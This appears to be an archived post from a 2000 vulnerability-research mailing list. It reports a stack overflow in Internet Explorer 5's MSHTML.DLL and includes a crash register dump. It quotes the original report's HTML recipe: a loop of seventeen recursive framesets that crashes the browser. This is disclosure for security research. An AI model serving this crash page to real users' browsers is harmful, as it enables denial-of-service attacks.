Vulnerability Development mailing list archives

Re: Stack Overflow in IE 5 (NT 4.0)

From: Erik Tayler <nine () 14x net>
Date: Tue, 15 Aug 2000 14:22:40 -0500

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I'm sure you've seen this, but decided to send.

IEXPLORE caused a stack fault in module MSHTML.DLL at 0167:70d1b842.
Registers:
EAX=00554030 CS=0167 EIP=70d1b842 EFLGS=00010206
EBX=80040104 SS=016f ESP=00554030 EBP=00554038
ECX=00551ce4 DS=016f ESI=004b3a7c FS=2d0f
EDX=00000000 ES=016f EDI=00000000 GS=0000
Bytes at CS:EIP:
85 01 8b e1 8b 08 8b 40 04 50 c3 00 00 00 53 6f
Stack dump:
70cfa920 70cfa268 00554068 70f52194 004e4e88 00000000 00000017
00000000 00000000 00000000 80040104 004f4864 00000000 00000000
00554090 70f52105

Erik Tayler
14x Network Security
http://www.14x.net

- ----- Original Message -----
From: "Sherrod, Andrew" <andrew.sherrod () TFN COM>
To: <VULN-DEV () SECURITYFOCUS COM>
Sent: Tuesday, August 15, 2000 10:59 AM
Subject: Stack Overflow in IE 5 (NT 4.0)

I am uncertain if this is exploitable, but it seems a possibility:

Create a web page as follows:

<HTML>
<HEAD>
<TITLE>
INFINITE FRAMES
</TITLE>
<FRAMESET rows=80,20>
<FRAME src="b.html">
<FRAME src="http://www.yahoo.com";>
</FRAMESET>
</HTML>

Save as "a.html".

Repeate, changing b to c and saving page as "b.html".

Continue through "q.html", which refers not to "r.html", but back
to "a.html":

(Text of q.html):

<HTML>
<HEAD>
<TITLE>
INFINITE FRAMES
</TITLE>
<FRAMESET cols=80,20>
<FRAME src="a.html">
<FRAME src="http://www.yahoo.com";>
</FRAMESET>
</HTML>

(Some cursory tests suggest 17 frames as the minimum to produce the
overflow.)

This page will have no effect on Netscape, which loads frames up
through q.html, leaving an empty frame where a.html should be.

IE 5 does the same, but also creates two blank buttons on the task
bar and sometimes briefly creates a floating white square in the
upper left corner of the screen. It does not crash immediately, but
when a new URL is entered a stack overflow occurs.

I haven't had time to fully examine this, or see if there is a
means to exploit the overflow.

AGS


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBOZmYfk0pQlPl0B0AEQIuIwCgqf+g7nmDJWgqlAWfjRvv9sdRgRUAoICp
XooqNmQArWbMTQA8mQd34qoV
=GEmo
-----END PGP SIGNATURE-----

Current thread:

Stack Overflow in IE 5 (NT 4.0) Sherrod, Andrew (Aug 15)
- Re: Stack Overflow in IE 5 (NT 4.0) Erik Tayler (Aug 15)
- <Possible follow-ups>
- Re: Stack Overflow in IE 5 (NT 4.0) Herakel Endrawes (Aug 16)
- Re: Stack Overflow in IE 5 (NT 4.0) Sherrod, Andrew (Aug 17)
- Re: Stack Overflow in IE 5 (NT 4.0) Sherrod, Andrew (Aug 21)